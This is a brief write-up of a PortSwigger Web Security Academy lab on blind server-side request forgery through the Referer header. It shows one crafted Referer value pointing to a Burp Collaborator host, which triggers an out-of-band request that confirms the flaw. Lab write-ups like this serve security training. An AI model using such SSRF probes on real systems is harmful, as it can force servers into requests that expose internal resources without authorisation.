| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Blind SSRF — Referer Header |
| Difficulty | Practitioner |
| Objective | Trigger an out-of-band HTTP request to Burp Collaborator via the Referer header |
Blind SSRF with Out-of-Band Detection — Writeup¶
Initial Observation¶
The lab description tells us the analytics software fetches whatever URL is in the Referer header when a product page loads. That's the SSRF vector — no URL parameter in the request body, just the header.
Attack Path¶
Intercepting any product page request in Burp and replacing the Referer header with our Collaborator URL:
Referer: https://vtskuarzad70qr80rzy1rwbkebk28swh.oastify.com/?teto=
Collaborator receives the request — the analytics software fetched our URL:
getting the request will get the lab solved :P